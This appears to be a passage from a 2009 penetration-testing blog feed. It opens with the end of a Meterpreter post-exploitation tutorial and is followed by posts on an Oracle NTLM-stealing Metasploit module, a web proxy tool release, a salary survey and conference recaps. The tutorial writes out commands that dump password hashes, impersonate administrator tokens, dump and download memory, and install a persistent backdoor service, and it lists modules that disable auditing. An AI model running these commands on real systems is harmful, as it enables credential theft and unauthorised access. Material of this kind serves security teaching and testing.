/&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;-HashDumps:&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;&lt;/b&gt;You can get the hashes of the user accounts, like the pwdump utility, for later cracking.&lt;/div&gt;&lt;div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; use privs (we load the privileges module)&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; hashdump&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You need Admin/System privileges to work.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;-User impersonation, using the token passing technique:&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by &lt;a href="http://sourceforge.net/projects/incognito"&gt;Luke Jennings&lt;/a&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; use incognito (we load the incognito module)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; list_tokens  (we list all available sessions)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You need Admin/System privileges to work.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;If you want to revert the situation an obtain your original session, you can execute:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; rev2self&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;More on working with Incognito and Meterpreter at &lt;a href="http://carnal0wnage.blogspot.com/2009/04/more-on-working-with-incognito-and.html"&gt;Carnal0wnage&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Dumping memory to extract hashes&lt;/b&gt; (using mdd.exe): &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Here we first need to upload mdd.exe&lt;a href="http://www.mantech.com/msma/MDD.asp"&gt; (Mantech)&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; upload mdd.exe .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; execute -f mdd.exe -a "-o mydump.dd"&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="font-family:'times new roman';"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;meterpreter&gt; download mydump.dd .&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Now we need can use volatility  to:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="text-align: justify;"&gt;&lt;ul&gt;&lt;li&gt;cachedump Dump (decrypted) domain hashes from the registry&lt;/li&gt;&lt;li&gt;hashdump Dump (decrypted) LM and NT hashes from the registry&lt;/li&gt;&lt;li&gt;hivelist Print list of registry hives&lt;/li&gt;&lt;li&gt;hivescan Scan for _CMHIVE objects (registry hives)&lt;/li&gt;&lt;li&gt;lsadump Dump (decrypted) LSA secrets from the registry&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;More information on using meterpreter + mdd + volatility  on &lt;a href="http://blog.attackresearch.com/?q=node/24"&gt;Attack Research&lt;/a&gt; blog&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Another resource for Meterpreter plugins is the &lt;a href="http://www.darkoperator.com/"&gt;DarkOperator&lt;/a&gt; website, where we can find some modules like:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Disable_Audit: Disable auditing, by changing the local security policy&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;GetGui: Script for enabling RDP service on target host.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Memdump: Automation for mdd&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;WinEnum: Script that will gather a big amount of information about the host&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;Soundrecorder: Allows you to record sound on the target machine :)&lt;/li&gt;&lt;/ul&gt;&lt;ul&gt;&lt;li style="text-align: justify;"&gt;GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.&lt;/li&gt;&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You can find examples of these modules and the source code in the the &lt;a href="http://www.darkoperator.com/"&gt;Darkoperator&lt;/a&gt; website under the &lt;a href="http://www.darkoperator.com/meterpreter/"&gt;meterpreter&lt;/a&gt; zone, many of them are included in the &lt;a href="http://www.metasploit.com/"&gt;Metasploit&lt;/a&gt; project.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Meterpreter service wrapper:&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from &lt;a href="http://www.phreedom.org/software/metsvc/"&gt;Phreedom.org&lt;/a&gt; (Alexander Sotirov)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span"  style="color:#009900;"&gt;c:&gt; metsvc.exe install-service  (it will launch on port 31337)&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Well that's all for now, i will like to thanks &lt;a href="http://carnal0wnage.blogspot.com/"&gt;Chris Gates&lt;/a&gt; and Carlos Perez (&lt;a href="http://www.darkoperator.com/"&gt;DarkOperator&lt;/a&gt;) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Also a big thanks for all the Metasploit team, for their great work.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;   &lt;/div&gt;&lt;div style="text-align: justify;"&gt;Enjoy your post exploitation ...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-CMM&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-8244992451559481875?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/04/meterpreter-post-exploitation-recap.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-9179813374677453374</guid><pubDate>Sat, 11 Apr 2009 10:16:00 +0000</pubDate><atom:updated>2009-04-11T12:36:34.188+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Oracle</category><category domain="http://www.blogger.com/atom/ns#">metasploit</category><title>From Oracle to the OS  with Metasploit</title><description>&lt;div style="text-align: justify;"&gt;I'm back from my vacations, and it's time write some new posts&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;I read an interesting article on how to obtain a shell through Oracle Database, this article was written by Alexandr Polyakov from &lt;a href="http://www.dsecrg.com"&gt;www.dsecrg.com&lt;/a&gt;, they have more interesting things about Oracle penetration testing on their website.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The article explains how to obtain an OS shell, via Pass the hash technique inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea  is to read a file over the network via SMB (ctxsys.context) and connect to a fake SMB server to steal the NTLM challenge-response.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The author explains the creation of a Metasploit plugin (&lt;a href="http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb?rev=6469"&gt;ora_ntlm_stealer&lt;/a&gt;) to automate the process, so you can get it by updating your svn copy.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Here is the &lt;a href="http://www.dsecrg.com/pages/pub/show.php?id=17"&gt;paper&lt;/a&gt; with the complete information&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enjoy&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-9179813374677453374?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/04/from-oracle-to-os-with-metasploit.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-5188539679000423554</guid><pubDate>Tue, 17 Mar 2009 22:55:00 +0000</pubDate><atom:updated>2009-03-18T00:04:36.087+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">tools</category><category domain="http://www.blogger.com/atom/ns#">webapps</category><category domain="http://www.blogger.com/atom/ns#">proxystrike</category><category domain="http://www.blogger.com/atom/ns#">proxy</category><title>ProxyStrike v2.0 released!</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3411/3251415324_242d45c681.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 108px;" src="http://farm4.static.flickr.com/3411/3251415324_242d45c681.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://farm4.static.flickr.com/3411/3251415324_242d45c681.jpg"&gt;&lt;/a&gt;&lt;p style="text-align: justify;margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font: normal normal normal 12px/normal Helvetica; "&gt;&lt;/p&gt;&lt;div&gt;I'm pleased to announce a new version of ProxyStrike, an active Web Application Proxy, a tool designed to find vulnerabilities while browsing an application. It was created because the problems we faced in the pentests of web applications that heavily depends on Javascript, not many web scanners did it good at this stage, so we came with this proxy.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Right now it has available Sql injection, XSS and Server side includes.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Highlights from this release:&lt;/div&gt;&lt;div&gt; • Plugin engine (Create your own plugins!)&lt;/div&gt;&lt;div&gt; • Automatic crawl process&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt; • Request interceptor&lt;/div&gt;&lt;div&gt; • Request diffing&lt;/div&gt;&lt;div&gt; • Request repeater&lt;/div&gt;&lt;div&gt; • Save/restore session&lt;/div&gt;&lt;div&gt; • Http request/response history&lt;/div&gt;&lt;div&gt; • Request parameter stats&lt;/div&gt;&lt;div&gt; • Request parameter values stats&lt;/div&gt;&lt;div&gt; • Request url parameter signing and header field signing&lt;/div&gt;&lt;div&gt; • Use of an alternate proxy (tor for example ;D )&lt;/div&gt;&lt;div&gt; • Attack logs&lt;/div&gt;&lt;div&gt; • Export results to HTML or XML&lt;/div&gt;&lt;div&gt; * Sql attacks (plugin)&lt;/div&gt;&lt;div&gt; • Server Side Includes (plugin)&lt;/div&gt;&lt;div&gt; • Xss attacks (plugin)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Check it at: http://www.edge-security.com/proxystrike.php&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Here is a video of the tool:&lt;/div&gt;&lt;p&gt;&lt;/p&gt;&lt;p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px"&gt;&lt;span class="Apple-style-span"   style="  white-space: pre; font-family:Arial;font-size:10px;"&gt;&lt;object width="480" height="295"&gt;&lt;param name="movie" value="http://www.youtube.com/v/l8kioy4QX7U&amp;amp;hl=en&amp;amp;fs=1"&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;embed src="http://www.youtube.com/v/l8kioy4QX7U&amp;amp;hl=en&amp;amp;fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="295"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica"&gt;Great Job from Carlos del Ojo (deepbit) for this new release&lt;/p&gt; &lt;p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px Helvetica; min-height: 14.0px"&gt;-CMM&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-5188539679000423554?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/proxystrike-v20-released.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-6480628603519847004</guid><pubDate>Tue, 17 Mar 2009 20:31:00 +0000</pubDate><atom:updated>2009-03-17T21:38:15.378+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">crisis</category><category domain="http://www.blogger.com/atom/ns#">salaries</category><category domain="http://www.blogger.com/atom/ns#">security market</category><title>Security Industry Salary and Certification Survey 2008</title><description>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.dragoslungu.com/wp-content/uploads/image/crisis.jpg"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;width: 147px; height: 231px;" src="http://www.dragoslungu.com/wp-content/uploads/image/crisis.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;div style="text-align: justify;"&gt;Sans Institute released an excellent study about the salaries in the Security industry and relations with certifications.  This is a great study for the professionals to know where they are in relation with they career.  I would like to see one of these studies for Europe, this one particularly covers USA.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The survey shows that the Security industry is one of less affected by the crisis, and where the companies plan to invest in this year.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;If someone need help for a European version, let me know.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Download &lt;a href="http://www.sans.org/resources/salary_survey_2008.pdf"&gt;here&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Here you have some interesting bits:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana; font-size: 11px; font-style: italic; line-height: 13px; "&gt;&lt;ul style="list-style-image: url(http://www.dragoslungu.com/wp-content/themes/typoxp-reloaded-091/img/li.png); "&gt;&lt;li style="padding-bottom: 5px; "&gt;&lt;p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; "&gt;Salaries for information security professionals are high. Over 38% of respondents earn US $100,000 or more per year.&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;&lt;p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; "&gt;41% of the respondents said their organizations use certifications as a factor when determining salary increases.&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;&lt;p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; "&gt;The overall mean funding for training was US $2,854 per year with a median of US $2,000 per year.&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;&lt;p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; "&gt;Digital forensics, intrusion detection, and penetration testing are the technical topics respondents are most interested in learning in 2009.&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;&lt;p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; "&gt;As of late November 2008, just over 79% of respondents forecast no information security personnel reductions in the next 12 months.&lt;/p&gt;&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;&lt;p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; "&gt;Over 25% of respondents plan to deploy the following technologies in 2009:&lt;/p&gt;&lt;ul style="list-style-image: url(http://www.dragoslungu.com/wp-content/themes/typoxp-reloaded-091/img/li.png); "&gt;&lt;li style="padding-bottom: 5px; "&gt;Configuration Management&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;SIEM (Security Information and Event Management)&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;Storage Security&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;Wireless Security Solutions&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li style="padding-bottom: 5px; "&gt;&lt;p style="margin-top: 10px; margin-right: 0px; margin-bottom: 10px; margin-left: 0px; "&gt;The best places to find an information security position are in the metro areas of Las Vegas, Nevada; Dallas, Texas; and Washington, DC.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-6480628603519847004?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/security-industry-salary-and.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-7864308985578266580</guid><pubDate>Tue, 17 Mar 2009 20:05:00 +0000</pubDate><atom:updated>2009-03-17T21:22:55.386+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">information gathering</category><category domain="http://www.blogger.com/atom/ns#">conference</category><category domain="http://www.blogger.com/atom/ns#">metagoofil</category><title>A fresh new look into Information Gathering v2</title><description>Here is the new version of my presentation "A fresh new look into Information Gathering v2" that i presented at &lt;a href="http://www.fistconference.org/"&gt;FI&lt;/a&gt;&lt;a href="http://www.fistconference.org/?s=8&amp;amp;id=16"&gt;ST Conference Barcelona&lt;/a&gt; one week ago.  It's a overview of some new sources and mostly based on Metadata and Metagoofil V2  (coming soon)&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;If you have some new source or technique that want to share, you are welcome :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Download &lt;a href="http://www.edge-security.com/docs/FIST-Conference-Christian%20Martorella-%20IG2.pdf"&gt;here&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Enjoy&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;-CMM&lt;div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-7864308985578266580?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/fresh-new-look-into-information.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-2804863525329580330</guid><pubDate>Mon, 16 Mar 2009 20:50:00 +0000</pubDate><atom:updated>2009-03-16T22:39:58.174+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">conference</category><category domain="http://www.blogger.com/atom/ns#">source</category><title>SOURCE BOSTON experience</title><description>&lt;div style="text-align: justify;"&gt;I recently came back from Boston were i attended to the SOURCE Conference Boston.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;It was really a good conference, an excellent speaker line up, and a great environment to do networking and meet new people from the industry.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The conference had a great balance between technical talks and business talks, addressing all the needs of a security professional. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;The conference started with an excellent speech by Peter Kuper, who gave his vision about the security market in these turbulent times. (&lt;a href="http://raffy.ch/blog/2009/03/11/the-security-market-as-seen-by-peter-kuper/"&gt;speech transcript here&lt;/a&gt;).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Then during the conference, i attended the followings talks:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;How Microsoft fixes security Vulnerabilities,  interesting insight about what happens behind the courtain of a security update.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Politically Motivated Denial of Service Attacks, Jose Nazario.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Mac OS Xploitation, Dino Dai Zovi (Dino promised to transform OSX in a first class citizen in Metasploit)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Attacking Layer 8: Client Side penetration testing, &lt;a href="http://carnal0wnage.blogspot.com/"&gt;Chris Gates&lt;/a&gt; and Vince Marvelli. They show how easy is to own the end user.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;DNS: Towards the Secure Infrastructure, Dan Kaminsky. This was the same presentation as DC.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Day 2:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;L0phtCrack 6 Release&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;400 apps in 40 days, Sahba Kazerooni. He explained how he faced a weird project of 400 applications in 40 days.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Get rich or Die Trying, Jeremiah Grossman. A cool talk on how to earn money exploiting different application vulnerabilities.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Vulnerabilities in Application Interpreters and Runtimes. Erik showed some vulnerabilities on different widely deployed interpreters and runtimes.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Day 3:&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Dissecting Foreign Web Attacks, Val Smith. Val analyzed a web attack from start to end, great info in his talk. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;That's all for 3 days.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Greets to Chris Gates, Vince Marvelli, Val Smith, Jose Nazario, Stacy Thayer, Christien Rioux, and everyone that i met at Boston.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Now &lt;a href="http://www.sourceconference.com/index.php/source-barcelona-2009/barc-info"&gt;SOURCE Barcelona&lt;/a&gt; is next,  in the coming days we will launch the Call for papers, don't miss this great conference in this great city :)&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;-CMM&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9218613-2804863525329580330?l=laramies.blogspot.com'/&gt;&lt;/div&gt;</description><link>http://laramies.blogspot.com/2009/03/source-boston-experience.html</link><author>noreply@blogger.com (Christian Martorella)</author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9218613.post-6695122873475401292</guid><pubDate>Fri, 06 Mar 2009 22:54:00 +0000</pubDate><atom:updated>2009-03-07T00:08:58.515+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">conference</category><category domain="http://www.blogger.com/atom/ns#">metagoofil</category><title>Fist Conference - 